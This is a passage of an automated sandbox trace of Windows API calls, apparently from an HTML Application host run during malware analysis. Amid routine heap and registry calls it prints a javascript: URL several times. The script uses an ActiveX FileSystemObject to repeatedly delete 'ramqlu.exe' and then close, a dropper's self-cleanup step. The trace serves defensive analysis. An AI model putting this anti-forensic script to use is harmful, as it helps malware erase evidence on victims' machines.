(HeapHandle=0x410000, Flags=0x0, Size=0x800) returned 0x44d5a8 [0066.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x800) returned 0x44ddb0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x44e5b8 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x800) returned 0x44e610 [0066.336] IsCharSpaceW (wch=0x48) returned 0 [0066.336] IsCharAlphaNumericW (ch=0x5c) returned 0 [0066.336] IsCharSpaceW (wch=0x5c) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x433638 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x44ee18 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433658 [0066.336] IsCharSpaceW (wch=0x41) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43fae8 [0066.336] IsCharAlphaNumericW (ch=0x20) returned 0 [0066.336] IsCharSpaceW (wch=0x20) returned 1 [0066.336] IsCharSpaceW (wch=0x7b) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445920 [0066.336] IsCharSpaceW (wch=0x20) returned 1 [0066.336] IsCharAlphaNumericW (ch=0x7b) returned 0 [0066.336] IsCharSpaceW (wch=0x62) returned 0 [0066.336] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44ee18 | out: hHeap=0x410000) returned 1 [0066.336] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.336] IsCharSpaceW (wch=0x3a) returned 0 [0066.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445948 [0066.412] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.412] IsCharSpaceW (wch=0x75) returned 0 [0066.412] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.412] IsCharSpaceW (wch=0x28) returned 0 [0066.412] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.412] IsCharSpaceW (wch=0x23) returned 0 [0066.412] IsCharSpaceW (wch=0x23) returned 0 [0066.412] IsCharSpaceW (wch=0x7d) returned 0 [0066.412] IsCharAlphaNumericW (ch=0x7d) returned 0 [0066.412] IsCharSpaceW (wch=0x29) returned 0 [0066.412] IsCharSpaceW (wch=0x75) returned 0 [0066.413] IsCharSpaceW (wch=0x75) returned 0 [0066.413] IsCharSpaceW (wch=0x29) returned 0 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x433698 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x44f020 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x424218 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fb00 [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fb18 [0066.413] CoTaskMemFree (pv=0x44c930) [0066.413] CoTaskMemFree (pv=0x43fa40) [0066.413] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4336b8 [0066.413] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.413] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.414] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0066.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x340) returned 0x44f060 [0066.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4a) returned 0x44f3c0 [0066.414] IsOS (dwOS=0x25) returned 1 [0066.414] GetSysColor (nIndex=26) returned 0xcc6600 [0066.414] IsOS (dwOS=0x25) returned 1 [0066.414] GetSysColor (nIndex=5) returned 0xffffff [0066.414] GetSysColor (nIndex=8) returned 0x0 [0066.414] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.414] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa40 [0066.476] wcstol (in: _String="0,0,255", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",0,255") returned 0 [0066.476] wcstol (in: _String="0,255", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",255") returned 0 [0066.476] wcstol (in: _String="255", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*="") returned 255 [0066.476] wcstol (in: _String="128,0,128", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",0,128") returned 128 [0066.476] wcstol (in: _String="0,128", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*=",128") returned 0 [0066.476] wcstol (in: _String="128", _EndPtr=0x2ce634, _Radix=10 | out: _EndPtr=0x2ce634*="") returned 128 [0066.479] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0066.479] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0066.480] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf6ec | out: phkResult=0x2cf6ec*=0xa8) returned 0x0 [0066.480] SHGetValueW (in: hkey=0xa8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x2cf6f0, pcbData=0x2cf6e8*=0xa | out: pdwType=0x0, pvData=0x2cf6f0, pcbData=0x2cf6e8*=0xa) returned 0x2 [0066.480] RegCloseKey (hKey=0xa8) returned 0x0 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4513a8 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43fa28 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3a) returned 0x4242a8 [0066.481] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6a) returned 0x451830 [0066.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x424888 [0066.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x26) returned 0x42d1e0 [0066.520] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6e) returned 0x4518a8 [0066.520] GetProcessHeap () returned 0x410000 [0066.520] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44c930 | out: hHeap=0x410000) returned 1 [0066.520] GetProcessHeap () returned 0x410000 [0066.520] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4503c0 | out: hHeap=0x410000) returned 1 [0066.521] GetProcessHeap () returned 0x410000 [0066.521] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43bb00 | out: hHeap=0x410000) returned 1 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4336d8 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4248b8 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4336f8 [0066.521] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4242f0 [0066.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x44c930 [0066.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x42d210 [0066.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x445998 [0066.523] GetAcceptLanguagesW () returned 0x0 [0066.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x424a98 [0066.523] GetClassNameW (in: hWnd=0x3017c, lpClassName=0x2cf9bc, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.523] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.523] GetParent (hWnd=0x3017c) returned 0x4015e [0066.523] GetClassNameW (in: hWnd=0x4015e, lpClassName=0x2cf9bc, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.523] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.523] GetParent (hWnd=0x4015e) returned 0x0 [0066.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x433718 [0066.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x42d240 [0066.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x433718 | out: hHeap=0x410000) returned 1 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f418 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x451490 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x94) returned 0x451920 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x433718 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x12) returned 0x433738 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x433758 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x4514a8 [0066.598] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x4514c0 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x4514d8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x4514f0 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c) returned 0x4459c0 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x4459e8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a) returned 0x445a10 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x433778 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x433798 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4337b8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4337d8 [0066.599] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x451508 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x451538 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x451550 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12) returned 0x4337f8 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe) returned 0x451568 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x451580 [0066.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x26) returned 0x42d270 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a38 | out: hHeap=0x410000) returned 1 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a60 | out: hHeap=0x410000) returned 1 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445a88 | out: hHeap=0x410000) returned 1 [0066.600] GetProcessHeap () returned 0x410000 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424858 | out: hHeap=0x410000) returned 1 [0066.600] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451508 | out: hHeap=0x410000) returned 1 [0066.601] IMoniker:GetDisplayName (in: This=0x4206a8, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x2cf980 | out: ppszDisplayName=0x2cf980*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.601] IUnknown:QueryInterface (in: This=0x4206a8, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x2cf958 | out: ppvObject=0x2cf958*=0x4206b4) returned 0x0 [0066.601] IUriContainer:GetIUri (in: This=0x4206b4, ppIUri=0x2cf988 | out: ppIUri=0x2cf988*=0x43c254) returned 0x0 [0066.601] IUnknown:Release (This=0x4206b4) returned 0x1 [0066.601] IUnknown:AddRef (This=0x4206a8) returned 0x2 [0066.601] IUnknown:AddRef (This=0x43c254) returned 0x5 [0066.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.601] IMoniker:GetDisplayName (in: This=0x4206a8, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x2cf860 | out: ppszDisplayName=0x2cf860*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.601] UrlGetLocationW (psz1="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.601] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppmk=0x2cf82c*=0x0, dwFlags=0x1 | out: ppmk=0x2cf82c*=0x4503c0) returned 0x0 [0066.602] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf370 | out: ppv=0x2cf370*=0x75028d20) returned 0x0 [0066.602] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf45c | out: ppvObject=0x2cf45c*=0x75028d2c) returned 0x0 [0066.602] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.603] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x451c00, cchResult=0x824, pcchResult=0x2cf770, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cf770*=0x0) returned 0x800c0011 [0066.603] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.603] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2cf824 | out: ppURI=0x2cf824*=0x43bfcc) returned 0x0 [0066.603] IUri:GetScheme (in: This=0x43bfcc, pdwScheme=0x2cf7bc | out: pdwScheme=0x2cf7bc*=0xf) returned 0x0 [0066.603] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0066.604] IUnknown:QueryInterface (in: This=0x43bfcc, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf7c4 | out: ppvObject=0x2cf7c4*=0x43bfcc) returned 0x0 [0066.604] IUnknown:Release (This=0x43bfcc) returned 0x2 [0066.604] IUnknown:AddRef (This=0x43bfcc) returned 0x3 [0066.604] IUnknown:Release (This=0x43bfcc) returned 0x2 [0066.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0066.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1c) returned 0x445a88 [0066.604] IUnknown:AddRef (This=0x43bfcc) returned 0x3 [0066.604] IUri:GetAbsoluteUri (in: This=0x43bfcc, pbstrAbsoluteUri=0x445a88 | out: pbstrAbsoluteUri=0x445a88*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.604] IUnknown:Release (This=0x43bfcc) returned 0x2 [0066.604] IUnknown:AddRef (This=0x4503c0) returned 0x2 [0066.604] IUnknown:Release (This=0x4503c0) returned 0x1 [0066.604] IUnknown:AddRef (This=0x4206a8) returned 0x3 [0066.604] IUnknown:Release (This=0x4503c0) returned 0x0 [0066.604] IUnknown:AddRef (This=0x4206a8) returned 0x4 [0066.604] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf62c | out: ppvObject=0x2cf62c*=0x43c254) returned 0x0 [0066.604] IUnknown:Release (This=0x43c254) returned 0x5 [0066.604] IUnknown:AddRef (This=0x43c254) returned 0x6 [0066.604] IUnknown:QueryInterface (in: This=0x4206a8, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x2cf600 | out: ppvObject=0x2cf600*=0x4206b4) returned 0x0 [0066.605] IUriContainer:GetIUri (in: This=0x4206b4, ppIUri=0x2cf654 | out: ppIUri=0x2cf654*=0x43c254) returned 0x0 [0066.605] IUnknown:Release (This=0x4206b4) returned 0x4 [0066.605] IUnknown:AddRef (This=0x4206a8) returned 0x5 [0066.605] IUnknown:Release (This=0x4206a8) returned 0x4 [0066.605] IUnknown:AddRef (This=0x43c254) returned 0x8 [0066.605] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf62c | out: ppvObject=0x2cf62c*=0x43c254) returned 0x0 [0066.605] IUnknown:Release (This=0x43c254) returned 0x8 [0066.605] IUnknown:AddRef (This=0x43c254) returned 0x9 [0066.605] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf624 | out: pdwScheme=0x2cf624*=0xf) returned 0x0 [0066.605] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc8) returned 0x451c00 [0066.605] GetCurrentProcessId () returned 0x358 [0066.605] IUnknown:QueryInterface (in: This=0x43c254, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf62c | out: ppvObject=0x2cf62c*=0x43c254) returned 0x0 [0066.605] IUnknown:Release (This=0x43c254) returned 0x9 [0066.605] IUnknown:AddRef (This=0x43c254) returned 0xa [0066.605] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf5fc | out: pdwScheme=0x2cf5fc*=0xf) returned 0x0 [0066.605] IUri:GetAbsoluteUri (in: This=0x43c254, pbstrAbsoluteUri=0x2cf62c | out: pbstrAbsoluteUri=0x2cf62c*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0066.606] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0066.606] SysStringLen (param_1="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x8b [0066.606] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x2cf648 | out: ppURI=0x2cf648*=0x43bfcc) returned 0x0 [0066.606] IUnknown:Release (This=0x43c254) returned 0x9 [0066.606] IUri:GetScheme (in: This=0x43bfcc, pdwScheme=0x2cf5dc | out: pdwScheme=0x2cf5dc*=0xf) returned 0x0 [0066.606] IUnknown:QueryInterface (in: This=0x43bfcc, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2cf5e4 | out: ppvObject=0x2cf5e4*=0x43bfcc) returned 0x0 [0066.606] IUnknown:Release (This=0x43bfcc) returned 0x3 [0066.606] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0066.606] IUnknown:Release (This=0x43bfcc) returned 0x3 [0066.606] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0066.606] IUri:GetPropertyDWORD (in: This=0x43bfcc, uriProp=0x11, pdwProperty=0x2cf3bc, dwFlags=0x0 | out: pdwProperty=0x2cf3bc*=0xf) returned 0x0 [0066.606] IInternetSecurityManager:GetSecurityId (in: This=0x444c48, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf420, pcbSecurityId=0x2cf41c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf420*=0x6a, pcbSecurityId=0x2cf41c*=0x8f) returned 0x0 [0066.606] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pbSecurityId=0x2cf420, pcbSecurityId=0x2cf41c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x2cf420*=0x0, pcbSecurityId=0x2cf41c*=0x200) returned 0x800c0011 [0066.607] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cecf8 | out: ppv=0x2cecf8*=0x75028d20) returned 0x0 [0066.607] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cede4 | out: ppvObject=0x2cede4*=0x75028d2c) returned 0x0 [0066.607] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.607] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x451df8, cchResult=0x8c, pcchResult=0x2cee2c, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cee2c*=0x8c) returned 0x0 [0066.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x451f18 [0066.607] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451f18 | out: hHeap=0x410000) returned 1 [0066.607] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.607] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cecf8 | out: ppv=0x2cecf8*=0x75028d20) returned 0x0 [0066.608] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cede4 | out: ppvObject=0x2cede4*=0x75028d2c) returned 0x0 [0066.608] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.608] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x451df8, cchResult=0x8c, pcchResult=0x2cee3c, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cee3c*=0x0) returned 0x800c0011 [0066.608] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.608] IUnknown:Release (This=0x43bfcc) returned 0x4 [0066.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f968 | out: hHeap=0x410000) returned 1 [0066.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x451e90 [0066.608] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f9e0 | out: hHeap=0x410000) returned 1 [0066.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8f) returned 0x451f28 [0066.630] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf624 | out: pdwScheme=0x2cf624*=0xf) returned 0x0 [0066.644] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.644] CreateCompatibleBitmap (hdc=0x1b0101ce, cx=1, cy=1) returned 0x405084a [0066.644] GetDIBits (in: hdc=0x1b0101ce, hbm=0x405084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x2cf1a8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x2cf1a8) returned 1 [0066.644] GetDIBits (in: hdc=0x1b0101ce, hbm=0x405084a, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x2cf1a8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x2cf1a8) returned 1 [0066.644] DeleteObject (ho=0x405084a) returned 1 [0066.644] GetSysColor (nIndex=0) returned 0xc8c8c8 [0066.644] GetSysColor (nIndex=1) returned 0x0 [0066.644] GetSysColor (nIndex=2) returned 0xd1b499 [0066.644] GetSysColor (nIndex=3) returned 0xdbcdbf [0066.645] GetSysColor (nIndex=4) returned 0xf0f0f0 [0066.645] GetSysColor (nIndex=5) returned 0xffffff [0066.645] GetSysColor (nIndex=6) returned 0x646464 [0066.645] GetSysColor (nIndex=7) returned 0x0 [0066.645] GetSysColor (nIndex=8) returned 0x0 [0066.645] GetSysColor (nIndex=9) returned 0x0 [0066.645] GetSysColor (nIndex=10) returned 0xb4b4b4 [0066.645] GetSysColor (nIndex=11) returned 0xfcf7f4 [0066.645] GetSysColor (nIndex=12) returned 0xababab [0066.645] GetSysColor (nIndex=13) returned 0xff9933 [0066.645] GetSysColor (nIndex=14) returned 0xffffff [0066.645] GetSysColor (nIndex=15) returned 0xf0f0f0 [0066.645] GetSysColor (nIndex=16) returned 0xa0a0a0 [0066.645] GetSysColor (nIndex=17) returned 0x6d6d6d [0066.645] GetSysColor (nIndex=18) returned 0x0 [0066.645] GetSysColor (nIndex=19) returned 0x544e43 [0066.645] GetSysColor (nIndex=20) returned 0xffffff [0066.645] GetSysColor (nIndex=21) returned 0x696969 [0066.645] GetSysColor (nIndex=22) returned 0xe3e3e3 [0066.645] GetSysColor 